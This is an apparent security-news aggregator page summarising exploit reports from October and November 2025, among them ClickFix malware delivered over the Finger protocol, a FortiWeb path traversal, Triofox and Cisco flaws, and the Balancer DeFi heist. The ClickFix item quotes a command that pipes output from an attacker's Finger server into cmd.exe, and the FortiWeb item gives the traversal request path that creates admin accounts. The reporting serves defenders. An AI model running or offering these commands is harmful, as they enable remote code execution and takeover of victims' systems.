All news with #exploit detected tag
Thu, November 20, 2025
Comet AI Browser's Embedded API Permits Device Access
⚠️ Security firm SquareX disclosed a previously undocumented MCP API inside the AI browser Comet that enables embedded extensions to execute arbitrary commands and launch applications — capabilities mainstream browsers normally block. The API can be triggered covertly from pages such as perplexity.ai, creating an execution channel exploitable via compromised extensions, XSS, MITM, or phishing. SquareX highlights that the analytics and agentic extensions are hidden and cannot be uninstalled, leaving devices exposed by default.
Wed, November 19, 2025
W3 Total Cache Plugin Critical PHP Command Injection
⚠️ A critical unauthenticated command injection (CVE-2025-9501) in the W3 Total Cache WordPress plugin allows attackers to execute arbitrary PHP via a crafted comment that abuses the _parse_dynamic_mfunc() routine. The developer released 2.8.13 on October 20 to address the flaw, but WordPress.org data indicate hundreds of thousands of sites may still be vulnerable. WPScan has produced a proof-of-concept exploit and plans public release on November 24, increasing the immediate risk for unpatched installations.
Sat, November 15, 2025
Decades-Old Finger Protocol Used to Deliver ClickFix Malware
🛡️ Researchers warn the decades-old Finger protocol is being repurposed in ClickFix-style campaigns to fetch remote commands and execute them on Windows systems. Attackers social-engineer victims into running batch commands such as finger root@finger.nateams[.]com | cmd, piping remote output directly into cmd.exe. Observed chains create randomly named folders, copy and rename curl.exe, download a ZIP disguised as a PDF, extract a Python malware package and launch it via pythonw.exe. Blocking outbound TCP port 79 is the primary mitigation to prevent systems from connecting to remote Finger daemons.
Sat, November 15, 2025
RondoDox Exploits XWiki Flaw to Rapidly Expand Botnet
⚠️ RondoDox has been observed exploiting unpatched XWiki instances to weaponize a critical eval injection, CVE-2025-24893, enabling arbitrary remote code execution via the /bin/get/Main/SolrSearch endpoint. The flaw was patched in XWiki 15.10.11, 16.4.1 and 16.5.0RC1 in late February 2025, but scanning and exploitation surged in November, including botnet-driven DDoS and cryptocurrency miner deployments. Security vendors noted spikes in activity on November 7 and November 11 and observed RondoDox adding this vector on November 3, 2025. Administrators should apply vendor patches immediately and review logs and network traffic for indicators of compromise.
Fri, November 14, 2025
FortiWeb Path Traversal Flaw Allows Admin Account Creation
⚠️ A path traversal vulnerability in Fortinet FortiWeb appliances is being actively exploited to create local administrative users without authentication. Researchers from Defused and PwnDefend described requests targeting the /api/v2.0/cmdb/system/admin%3f/../../../../../cgi-bin/fwbcgi endpoint that inject admin accounts. Rapid7 and others confirm versions 8.0.1 and earlier are affected, while 8.0.2 is believed to contain the fix. Administrators are urged to update immediately, review logs for fwbcgi access, and search for unexpected admin accounts.
Thu, November 13, 2025
CISA Orders Feds to Patch Actively Exploited Cisco Flaws
🔒 CISA has ordered U.S. federal agencies to fully patch two actively exploited vulnerabilities in Cisco firewall appliances within 24 hours. Tracked as CVE-2025-20362 and CVE-2025-20333, the flaws permit unauthenticated access to restricted URL endpoints and remote code execution; chained together they can yield full device takeover. The agency emphasized applying the latest updates to all ASA and Firepower devices immediately, not just Internet-facing units.
Wed, November 12, 2025
Amazon: Threat Actor Exploited Cisco and Citrix Zero-Days
⚠️ Amazon's threat intelligence team disclosed that it observed an advanced threat actor exploiting two zero-day vulnerabilities in Citrix NetScaler ADC (CVE-2025-5777) and Cisco Identity Services Engine (CVE-2025-20337) to deploy a custom web shell. The backdoor, disguised as an IdentityAuditAction component, operates entirely in memory, uses Java reflection to inject into running threads, and registers a Tomcat listener to monitor HTTP traffic. Amazon observed the activity via its MadPot honeypot, called the actor highly resourced, and noted both flaws were later patched by the vendors.
Tue, November 11, 2025
Attackers Exploit Critical Triofox Flaw for Code Execution
⚠️ Mandiant and Google GTIG observed UNC6485 exploiting a critical improper access control flaw, CVE-2025-12480, in Gladinet Triofox versions prior to 16.7.10368.56560. Attackers spoofed a localhost Host header to reach setup pages, create a native 'Cluster Admin' account and upload payloads. They abused the product's anti‑virus configuration to execute arbitrary scripts as SYSTEM, then deployed remote access tools, escalated privileges and exfiltrated credentials. Users are urged to update, audit admin accounts and hunt for indicators of compromise.
Mon, November 10, 2025
Triofox CVE-2025-12480: Unauthenticated Access Leads to RCE
⚠️ Mandiant Threat Defense observed active exploitation of an unauthenticated access control vulnerability in Gladinet's Triofox (CVE-2025-12480) that allowed attackers to bypass authentication and reach administrative setup pages. By manipulating the HTTP Host header to impersonate localhost, attackers accessed protected admin workflows, created a native admin account, and configured the built-in anti‑virus engine to execute a malicious script as SYSTEM. The chain led to a PowerShell downloader, installation of a legitimate Zoho UEMS agent, and deployment of remote access tools; the vulnerability affected Triofox 16.4.10317.56372 and was mitigated in 16.7.10368.56560. Operators should upgrade immediately, audit admin accounts, and restrict anti‑virus engine paths.
Fri, November 7, 2025
LandFall Spyware Abused Samsung DNG Zero-Day via WhatsApp
🔒 A threat actor exploited a Samsung Android image-processing zero-day, CVE-2025-21042, to deliver a previously unknown spyware called LandFall using malicious DNG images sent over WhatsApp. Researchers link activity back to at least July 23, 2024, and say the campaign targeted select Galaxy models in the Middle East. Unit 42 found a loader and a SELinux policy manipulator in the DNG files that enabled privilege escalation, persistence, and data exfiltration. Users are advised to apply patches promptly, disable automatic media downloads, and enable platform protection features.
Fri, November 7, 2025
Cisco Firewall Zero-Days Now Triggering DoS Reboots
⚠️ Cisco warned that two recently patched firewall vulnerabilities (CVE-2025-20362 and CVE-2025-20333) — previously leveraged in zero-day intrusions — are now being abused to force ASA and FTD devices into unexpected reboot loops, causing denial-of-service. The vendor issued updates on September 25 and strongly urged customers to apply fixes immediately. CISA issued an emergency 24-hour directive for U.S. federal agencies and ordered EoS ASA devices to be disconnected. Shadowserver still reports tens of thousands of internet-exposed, unpatched devices.
Thu, November 6, 2025
Cisco Warns of Firewall Attack Causing DoS; Urges Patch
⚠️ Cisco disclosed a new attack variant that targets devices running Cisco Secure Firewall ASA and FTD software that are vulnerable to CVE-2025-20333 and CVE-2025-20362. The exploit can cause unpatched devices to unexpectedly reload, creating denial-of-service conditions, and follows prior zero-day campaigns that delivered malware such as RayInitiator and LINE VIPER, per the U.K. NCSC. Cisco additionally released patches for critical Unified CCX flaws and a high-severity DoS bug in ISE, and urges customers to apply updates immediately.
Thu, November 6, 2025
Critical RCE in React Native CLI Exposes Dev Servers
⚠️ A critical remote-code execution vulnerability in @react-native-community/cli and its cli-server-api component lets attackers run arbitrary OS commands via the Metro development server. The flaw stems from a /open-url endpoint that forwards a supplied URL directly to the open() package and, despite console messages, the server can bind to 0.0.0.0 rather than localhost. JFrog demonstrated Windows exploitation and the issue is fixed in cli-server-api version 20.0.0; users should update or bind the server to 127.0.0.1.
Tue, November 4, 2025
Balancer DeFi Protocol Loses Over $120M in Cyber Heist
🔐 Balancer, an Ethereum automated market maker, has been hit by a sophisticated exploit of its V2 Composable Stable Pools, with estimated losses exceeding $120 million. The team says pools that could be paused have been placed into recovery mode while it works with leading security researchers to investigate. Early analysis suggests a 'rounding down' precision loss in the Balancer Vault calculations was exploited and amplified via the batchSwap function. Balancer confirmed V3 pools were not affected and warned users about related phishing scams.
Mon, November 3, 2025
Balancer V2 Exploit Drains Over $120 Million in Crypto
🚨 Balancer announced an exploit of its V2 Composable Stable Pools on Ethereum at 07:48 UTC that resulted in reported losses exceeding $128 million. Initial analysis from GoPlus Security points to a precision rounding error in the Vault’s swap calculations that an attacker chained via batchSwap, while other researchers suggest improper authorization and callback handling in V2 vaults. Balancer says the issue is isolated to V2 Composable Stable Pools, with V3 and other pools unaffected, and the team is working with security researchers on a full post‑mortem. Users are warned to remain vigilant for scams and phishing attempts following the incident.
Thu, October 30, 2025
Brash Exploit Crashes Chromium Browsers via Title API
⚠️ Security researcher Jose Pino disclosed "Brash", a severe flaw in the Blink rendering engine that can crash many Chromium-based browsers within 15–60 seconds via a single malicious URL. The root cause is missing rate limiting on the document.title API, enabling attackers to inject millions of DOM mutations per second and saturate the browser UI thread. Pino describes a three-phase technique — hash generation, burst injection, and UI-thread saturation — and warns the code can be time-triggered to act like a logic bomb. Affected products include Google Chrome, Microsoft Edge, Brave, Opera, Vivaldi, Arc, Dia, and some AI browser interfaces; Firefox and Safari are not vulnerable.
Thu, October 30, 2025
Chromium Blink flaw crashes Chrome, Edge; exploit published
⚠ A researcher, Jose Pino, published a proof-of-concept on October 29 demonstrating a Blink rendering-engine flaw that can crash Chrome, Microsoft Edge and several other Chromium-based browsers within seconds by flooding document.title updates. Pino says he reported the issue to Google on August 28 and, after no response, released the PoC to force public attention. The exploit saturates the main thread with millions of DOM mutations per second, producing rapid CPU spikes, tab freezes and eventual process termination, and it raises particular concern for headless and automated enterprise workflows.
Thu, October 30, 2025
ThreatsDay: DNS Poisoning, Supply-Chain Heist, New RATs
🔔 This week's ThreatsDay bulletin highlights a critical BIND9 vulnerability (CVE-2025-40778) enabling DNS cache poisoning and a public PoC, along with widespread campaign activity from loaders, commodity RATs and supply-chain trojans. Other notable items include a guilty plea by a former defense employee for selling cyber-exploit components to a Russian broker, a new Linux Rust dual-personality evasion technique, and Avast's free decryptor for Midnight ransomware. Recommended defensive actions emphasize patching to the latest BIND9 releases, enabling DNSSEC, restricting recursion, and strengthening monitoring and authentication controls.
Thu, October 30, 2025
Smashing Security Podcast 441: Poker, F1 Data Risks
🎧 In episode 441 Graham Cluley and guest Danny Palmer discuss an alleged poker scam that reportedly involved basketball players working with organised crime to cheat high‑stakes games using hacked shufflers, covert cameras and an X‑ray card table. Researchers also uncovered that an FIA driver portal could be probed to expose personal details of Formula 1 stars. The hosts close with Graham’s “Pick of the Week,” a surreal CAPTCHA browser game, and a lighter cultural segment.
Mon, October 27, 2025
Critical WordPress Plugin Flaws Exploited at Scale Globally
🔴 Wordfence warns that threat actors are actively exploiting three critical 2024 CVEs in popular WordPress plugins, GutenKit and Hunk Companion, which report more than 40,000 and 8,000 active installations respectively. The vulnerabilities permit unauthenticated attackers to install and activate arbitrary plugins or upload spoofed plugin files, enabling remote code execution (RCE) and straightforward site takeover when exploited or chained with other flaws. Discovered via Wordfence's bug bounty in late September and early October, the campaign reignited on 8 October and the vendor has already blocked nearly 8.8 million exploitation attempts while urging administrators to update or remove affected versions.